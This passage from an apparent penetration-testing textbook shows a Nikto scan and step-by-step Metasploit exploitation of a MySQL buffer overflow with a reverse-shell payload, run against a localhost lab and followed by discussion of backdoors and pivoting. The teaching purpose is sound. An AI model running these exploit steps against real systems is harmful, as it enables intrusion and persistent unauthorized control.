There is even functionality to have Nikto launched automatically from Nessus when a web server is found. We will be running Nikto directly from the command line in a BackTrack terminal, but you can search the Nessus blog for the write-up on how these two tools can work together in an automated way.

Nikto is built into BackTrack and is executed directly in the terminal. First, you need to browse to the Nikto directory by executing the cd /pentest/web/nikto command in a terminal window.

Alternatively, you can launch a terminal window directly in the Nikto directory from the BackTrack menu by clicking Applications → BackTrack → Vulnerability Assessment → Web Application Assessment → Web Vulnerability Scanners → Nikto as shown in Figure 2.6.

FIGURE 2.6 Opening Nikto from BackTrack menu.

You should always update Nikto by executing the perl nikto.pl -update command before using the scanner to ensure that you have the most recent plug-in signatures. You can run the scanner against our localhost with the following command where the -h switch is used to define our target address (127.0.0.1) and the -p switch is used to specify which ports we want to probe (1-500).

perl nikto.pl -h 127.0.0.1 -p 1-500

It would have been just as simple to specify only port 80 for our scan, as we already know this is the only port that DVWA is using to communicate over HTTP. In fact, if you don’t specify ports for Nikto to scan, it will scan only port 80 by default. As expected, Nikto provides summary results from its scan of our DVWA web server.

+ Server: Apache/2.2.14 (Ubuntu)

+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.9

+ Root page / redirects to: login.php

+ robots.txt contains 1 entry which should be manually viewed.

+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.

+ ETag header found on server, inode: 829490, size: 26, mtime: 0x4c4799096fba4

+ OSVDB-3268: /config/: Directory indexing found.

+ /config/: Configuration information may be available remotely.

+ OSVDB-3268: /doc/: Directory indexing found.

+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.

+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.

+ OSVDB-3092: /login/: This might be interesting. . .

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3268: /docs/: Directory indexing found.

+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ /login.php: Admin login page/section found.

+ 6456 items checked: 0 error(s) and 16 item(s) reported on remote host

+ End Time: 2012-07-11 09:27:23 (20 seconds)

The most important takeaway from Nikto’s output is the set of Open Source Vulnerability Database (OSVDB) entries, which provide specific information about discovered vulnerabilities. These identifiers are very similar to the CVE identifiers that Nessus and Metasploit use. OSVDB is an independent, open-source project with the goal of providing unbiased technical information on over 90,000 vulnerabilities related to over 70,000 products. I encourage you to visit http://osvdb.org for more information and to retrieve technical details about your Nikto findings.
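If you save Nikto’s summary to a text file, you can pull the OSVDB identifiers out programmatically before looking them up. The following is a minimal Python sketch, assuming the report lines look exactly like the sample output above (a leading "+ ", then "OSVDB-<number>: <path>: <description>"). The function name osvdb_findings is hypothetical and is not part of Nikto.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Assumed line shape, taken from the sample output:
# "+ OSVDB-3268: /config/: Directory indexing found."
OSVDB_LINE = re.compile(r"^\+ OSVDB-(\d+): (\S+): (.*)$")


def osvdb_findings(report: str) -> dict[int, list[str]]:
    """Group the paths Nikto reported under each OSVDB identifier."""
    findings: dict[int, list[str]] = defaultdict(list)
    for line in report.splitlines():
        match = OSVDB_LINE.match(line.strip())
        if match:  # lines without an OSVDB ID (e.g. "+ Server: ...") are skipped
            osvdb_id, path, _description = match.groups()
            findings[int(osvdb_id)].append(path)
    return dict(findings)


sample = """+ Server: Apache/2.2.14 (Ubuntu)
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc."""

print(osvdb_findings(sample))
```

Grouping by identifier means a single OSVDB entry (such as 3268, directory indexing) only needs to be researched once, even when Nikto reports it for several directories.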

Exploitation

Exploitation is the moment when all the information gathering, port scanning, and vulnerability scanning pay off and you gain unauthorized access to, or remote code execution on, the target machine. One goal of network exploitation is to gain administrative-level rights on the target machine (the web server, in our world) and execute code. Once that occurs, the hacker has complete control of that machine and is free to take any action, which usually includes adding users, adding administrators, installing additional hacking tools locally on that machine to penetrate further into the network (also known as “pivoting”), and installing backdoor code that enables persistent connections to the exploited machine. A persistent backdoor is like having a key made for a house you have already broken into, so you can stop climbing in through the basement window. It’s much easier to use a key, and you’re actually less likely to get caught!

We are going to use Metasploit as our exploitation tool of choice. Metasploit is an exploitation framework developed by HD Moore and is widely accepted as the premier open-source exploitation toolkit available today. The Metasploit Framework (MSF or msf) provides a structured way to exploit systems and allows the community of users to develop, test, deploy, and share exploits with each other. Once you understand the basics of the MSF, you can use it effectively during all of your hacking adventures, regardless of the target systems. Metasploit occupies only a portion of one chapter in this book, but please take the time in the future to become more familiar with this great exploitation framework.

Before we dive into the actual exploitation steps, here are a few definitions to ensure that we are all working from the same base terminology.

■ Vulnerability: A potential weakness in the target system. It may be a missing patch, the use of a known weak function (like strcpy in the C language), a poor implementation, an incorrect use of a query language (such as SQL), or any other potential problem that a hacker can target.

■ Exploit: A collection of code that delivers a payload to a targeted system.

■ Payload: The end goal of an exploit, which results in malicious code being executed on the targeted system. Some popular payloads include a bind shell (the target listens on a port and gives you a cmd window in Windows or a shell in Linux when you connect), a reverse shell (the victimized computer makes a connection back to you, which is much less likely to be detected), VNC injection to allow remote desktop control, and adding an administrator on the targeted system.

Basics of Metasploit

We’ll be following a lightweight process that uses seven MSF commands to complete our exploitation phase:

1. Search: We will search for all related exploits in MSF’s database based on the CVE identifiers reported in the Nessus results.

2. Use: We will select the exploit that best matches the CVE identifier.

3. Show Payloads: We will review the available payloads for the selected exploit.

4. Set Payload: We will select the desired payload for the selected exploit.

5. Show Options: We will review the options that must be set for the selected exploit and payload.

6. Set Options: We will assign values to all of the required options that must be present for the payload to succeed.

7. Exploit: We will then send our well-crafted exploit to the targeted system.
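The seven steps map one-to-one onto console commands. As a minimal sketch, the hypothetical Python helper below (it is not part of Metasploit) assembles them in order from your choices, which makes a handy checklist; you could also save the lines to a text file and replay them with msfconsole -r. The example arguments are the CVE, module, payload, and localhost addresses used in this chapter.

```python
from __future__ import annotations


def msf_commands(search_term: str, module: str, payload: str,
                 options: dict[str, str]) -> list[str]:
    """Return msfconsole commands for the seven-step workflow, in order."""
    commands = [
        f"search {search_term}",    # 1. Search
        f"use {module}",            # 2. Use
        "show payloads",            # 3. Show Payloads
        f"set payload {payload}",   # 4. Set Payload
        "show options",             # 5. Show Options
    ]
    # 6. Set Options: one "set NAME VALUE" line per option you must fill in
    commands += [f"set {name} {value}" for name, value in options.items()]
    commands.append("exploit")      # 7. Exploit
    return commands


for line in msf_commands(
    "2009-4484",
    "exploit/linux/mysql/mysql_yassl_getname",
    "generic/shell_reverse_tcp",
    {"RHOST": "127.0.0.1", "LHOST": "127.0.0.1"},
):
    print(line)
```

Keeping the two show commands in the list is deliberate: they change nothing on the target, but they are where you confirm your choices before the final exploit line.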

To begin, we need to launch the Metasploit Framework. This is easily done in a terminal by issuing the msfconsole command. It will take about a minute to load Metasploit (especially the first time you run it), so don’t be alarmed if nothing seems to be happening. All the commands shown in this section are entered in a terminal window at the msf > prompt.

It is good practice to update Metasploit on an almost daily basis as new exploits are developed around the clock. The msfupdate command will update the entire framework so you can be sure that you have the latest and greatest version of Metasploit.

Search

The first task is to find available exploits in Metasploit that match the CVE identifiers that we found during vulnerability scanning with Nessus. We will search for CVE-2009-4484 from our localhost-check vulnerability scan by issuing the search 2009-4484 command in Metasploit. This vulnerability affects the version of MySQL that our web server is running, which is vulnerable to multiple stack-based buffer overflows that allow remote attackers to execute arbitrary code or cause a denial of service.

The results of this search list all the available exploits that Metasploit can use against the vulnerability, as shown here.

Matching Modules
================

Name                                     Disclosure Date  Rank  Description
----                                     ---------------  ----  -----------
exploit/linux/mysql/mysql_yassl_getname  2010-01-25       good  MySQL yaSSL CertDecoder::GetName Buffer Overflow

Use the exploit rank as a guide for which exploit to select. Each exploit has one of seven possible rankings: excellent (best choice), great, good, normal, average, low, and manual (worst choice). Lower-ranked exploits are more likely to crash the target system and may not be able to deliver the selected payload. We have only one exploit, with a good ranking, which will allow us to execute remote code on the target machine. Good is a middle-of-the-road ranking; many vulnerabilities have exploits ranked excellent or great.
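Because the rankings form a fixed order, picking the best search result is just a matter of comparing positions in that order. Here is a minimal Python sketch, assuming you have copied each module’s name and rank out of the search results by hand; the function best_module and the example module names are hypothetical.

```python
from __future__ import annotations

# Metasploit's seven exploit rankings, best first (as listed above)
RANKS = ["excellent", "great", "good", "normal", "average", "low", "manual"]


def best_module(results: list[tuple[str, str]]) -> str:
    """Return the name of the highest-ranked (name, rank) search result.

    Ties go to whichever module appears first in the results.
    An unknown rank string raises ValueError from list.index().
    """
    name, _rank = min(results, key=lambda result: RANKS.index(result[1]))
    return name


# Hypothetical search results with mixed rankings
results = [
    ("exploit/example/module_a", "normal"),
    ("exploit/example/module_b", "great"),
    ("exploit/example/module_c", "low"),
]
print(best_module(results))  # exploit/example/module_b
```

With our single search result, the helper simply returns exploit/linux/mysql/mysql_yassl_getname; the ordering only matters when a search turns up several candidates.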

Alert

When thinking about exploitation, imagine you are on a big-game hunting adventure. The search command is like reviewing all the animals you could target on such an adventure. Do you want to hunt bear, elk, or mountain lion?

Use

Once you’ve retrieved all the possible exploits in Metasploit and decided on the best choice for your target, you can select it by issuing the following use command.

use exploit/linux/mysql/mysql_yassl_getname

You will receive the following prompt signaling that the use command has executed successfully.

msf exploit(mysql_yassl_getname) >

Alert

The use command is the equivalent of deciding we are going to hunt mountain lion on our hunting adventure!

Show Payloads

The show payloads command displays all the payloads that are compatible with the selected exploit; any one of them can be the payoff when the exploit successfully lands.

Compatible Payloads
===================

Name                                    Disclosure Date  Rank    Description
----                                    ---------------  ----    -----------
generic/custom                                           normal  Custom Payload
generic/debug_trap                                       normal  Generic x86 Debug Trap
generic/shell_bind_tcp                                   normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                                normal  Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                       normal  Generic x86 Tight Loop
linux/x86/adduser                                        normal  Linux Add User
linux/x86/chmod                                          normal  Linux Chmod
linux/x86/exec                                           normal  Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp                      normal  Linux Meterpreter, Bind TCP Stager (IPv6)
linux/x86/meterpreter/bind_tcp                           normal  Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/reverse_ipv6_tcp                   normal  Linux Meterpreter, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_tcp                        normal  Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp                                normal  Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp                             normal  Linux Meterpreter Service, Reverse TCP Inline
linux/x86/shell/bind_ipv6_tcp                            normal  Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp                                 normal  Linux Command Shell, Bind TCP Stager
linux/x86/shell/reverse_ipv6_tcp                         normal  Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_tcp                              normal  Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp                            normal  Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp                                 normal  Linux Command Shell, Bind TCP Inline
linux/x86/shell_reverse_tcp                              normal  Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2                             normal  Linux Command Shell, Reverse TCP - Metasm demo

A quick review of the rankings of these payloads doesn’t give us any direction on which one to select as they are all normal. That’s perfectly fine; we could attempt this exploit several times with different payloads if we needed to.
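Since the rankings don’t help here, the payload names themselves are the next best hint. In this list, reverse payloads contain "reverse" in their final name segment and bind payloads contain "bind"; the descriptions also show that four-segment names such as linux/x86/shell/reverse_tcp are Stagers, while the shorter names such as linux/x86/shell_reverse_tcp are Inline. The Python sketch below applies those two observations. Treat it as a heuristic drawn from this particular list, not an official Metasploit rule; the function name describe_payload is hypothetical.

```python
from __future__ import annotations


def describe_payload(name: str) -> tuple[str, str]:
    """Classify a payload name by connection direction and delivery style.

    Heuristic based only on the 'show payloads' list in this chapter.
    """
    segments = name.split("/")
    last = segments[-1]
    if "reverse" in last:
        direction = "reverse"   # target connects back to LHOST
    elif "bind" in last:
        direction = "bind"      # target listens, attacker connects in
    else:
        direction = "other"     # e.g. adduser, exec, debug_trap
    # platform/arch/stage/stager -> staged; anything shorter -> inline
    style = "staged" if len(segments) == 4 else "inline"
    return direction, style


for payload in ["generic/shell_reverse_tcp",
                "linux/x86/shell/bind_tcp",
                "linux/x86/exec"]:
    print(payload, describe_payload(payload))
```

Filtering on the "reverse" direction narrows the list to the payloads that match the reverse-shell approach this chapter takes next.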

Alert

The show payloads command is like reviewing all possible gun types!

Set Payload

Now that you know which payloads are available for this exploit, it’s time to choose one. In the following command, we select a reverse shell as the payload so we will have command-line access to the target machine. The connection is initiated from the exploited machine, so it’s less likely to be caught by intrusion detection systems. You set the payload with the set payload command.

set payload generic/shell_reverse_tcp

You will receive the following confirmation message and prompt signaling that the set payload command has executed successfully.

payload => generic/shell_reverse_tcp

msf exploit(mysql_yassl_getname) >

Alert

The set payload command is like selecting a sniper rifle to hunt our mountain lion. (If you haven’t guessed by now, I’m not much of a hunter. But stick with me because the analogy is pure gold!)

Show Options

Each exploit and payload has specific options that must be set for the attack to succeed. In most cases, we need to set the IP addresses of the targeted machine and our attacker machine. The targeted machine is known as the remote host (RHOST), while the attacker machine is known as the local host (LHOST). The show options command provides the following details for both the exploit and the payload.

Module options (exploit/linux/mysql/mysql_yassl_getname):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3306             yes       The target port

Payload options (generic/shell_reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

There are two options in this module that are required: RHOST and RPORT. These two entries dictate what address and port the exploit should be sent to. We will set the RHOST option in the upcoming section and leave the RPORT as is, so it uses port 3306.

There are also two required options in the payload: LHOST and LPORT. LPORT already defaults to 4444, which we will keep, so we only need to set LHOST for this payload to succeed.

Alert

The show options command is like considering what supplies we are going to take on our hunting adventure. We need to select a bullet type, a scope type, and how big a backpack to bring along on the trip.

Set Options

We need to assign values to all of the required exploit and payload options that are blank by default. If you leave any of them blank, your exploit will fail because it doesn’t have the information it needs to complete successfully. We will set both RHOST and LHOST to 127.0.0.1 because we have a self-contained environment. In a real attack, these two IP addresses would obviously be different. Remember that RHOST is the target machine and LHOST is your hacking machine. You can issue the set RHOST 127.0.0.1 and set LHOST 127.0.0.1 commands, as shown below, to set these two options.

set RHOST 127.0.0.1

RHOST => 127.0.0.1

set LHOST 127.0.0.1

LHOST => 127.0.0.1

You can issue another show options command to make sure everything is set correctly before moving on.

Module options (exploit/linux/mysql/mysql_yassl_getname):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  127.0.0.1        yes       The target address
RPORT  3306             yes       The target port

Payload options (generic/shell_reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  127.0.0.1        yes       The listen address
LPORT  4444             yes       The listen port

It is confirmed that we have set all the required options for the exploit and the payload. We are almost there!
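The rule stated earlier, that every required option needs a value before you run exploit, is easy to check mechanically. As a minimal sketch, assuming you transcribe the show options rows into Python by hand, the hypothetical missing_required function below lists every required option that is still blank. Run against the first show options output it flags RHOST and LHOST; against the second it finds nothing.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Option:
    """One row of 'show options' output."""
    name: str
    current: str      # empty string when no value is set
    required: bool


def missing_required(options: list[Option]) -> list[str]:
    """Return the names of required options that have no value yet."""
    return [opt.name for opt in options if opt.required and not opt.current.strip()]


before = [
    Option("RHOST", "", True),
    Option("RPORT", "3306", True),
    Option("LHOST", "", True),
    Option("LPORT", "4444", True),
]
after = [
    Option("RHOST", "127.0.0.1", True),
    Option("RPORT", "3306", True),
    Option("LHOST", "127.0.0.1", True),
    Option("LPORT", "4444", True),
]
print(missing_required(before))  # ['RHOST', 'LHOST']
print(missing_required(after))   # []
```

RPORT and LPORT never appear in the result because their defaults (3306 and 4444) already count as values.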

Alert

The set option command is like deciding we want Winchester bullets, the 8″ night vision scope, and the 3-day backpack for our hunting adventure.

Exploit

You have done your homework and have reached the point where, with one command, you will have complete control of the targeted machine. Simply issue the exploit command, and the exploit we built is sent to the target. If your exploit is successful, you will receive the following confirmation in the terminal, showing that one session is open on the target machine.

Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:3306)

Alert

The exploit command is like pulling the trigger.

You can interact with this session by issuing the sessions -i 1 command. You now control the target machine completely; it’s as if you were sitting at its keyboard. You can list all open sessions by issuing the sessions command.

Alert

If you run into an “Invalid session id” or “no active sessions” error, the problem is related to the configuration of the MySQL server running on your BackTrack VM. This specific exploit is only applicable to certain versions of MySQL running with a specific SSL configuration. For details of the exact configuration and how you can tweak your VM to ensure successful exploitation, please see https://dev.mysql.com/doc/refman/5.1/en/configuring-for-ssl.html. Even if you tweak your MySQL installation, the exploitation steps introduced in this section remain unchanged. In fact, these same steps can be used for most network-based attacks that you’d like to attempt!

Another option is to download a separate VM that is dedicated to network hacking and provides vulnerable services for conducting the steps in this chapter. Metasploitable is one such VM; it is provided by the Metasploit team and can be downloaded at http://www.offensive-security.com/metasploit-unleashed/Metasploitable. You would then have two separate VMs for working through this chapter (one attacker VM and one victim VM).

Maintaining Access

Maintaining access is when a hacker plants a backdoor so he/she maintains complete control of the exploited machine and can return to it at a later time without having to exploit it again. It is the icing on the exploitation cake! Although it’s not part of our Basics of Web Hacking approach, it deserves discussion. Topics such as rootkits, backdoors, Trojans, viruses, and botnets all fall into the maintaining access category.

Perhaps the most common tool used for maintaining access is Netcat. This tool has been dubbed the Swiss Army Knife of hacking because of its flexibility in setting up, configuring, and processing network communication between several machines. Netcat is often one of the first tools installed after exploiting a system because the hacker can then dig even deeper into the network and attempt to exploit additional computers by pivoting. Pivoting means using an already exploited machine as an attack platform against additional computers on the internal network that would otherwise be inaccessible to outside traffic. Later chapters include specific Netcat examples as we exploit the web application. As more computers are exploited, the hacker continues to pivot deeper into the internal network and, if left undetected, may eventually compromise every computer on the network. This is the stuff hackers’ dreams are made of!
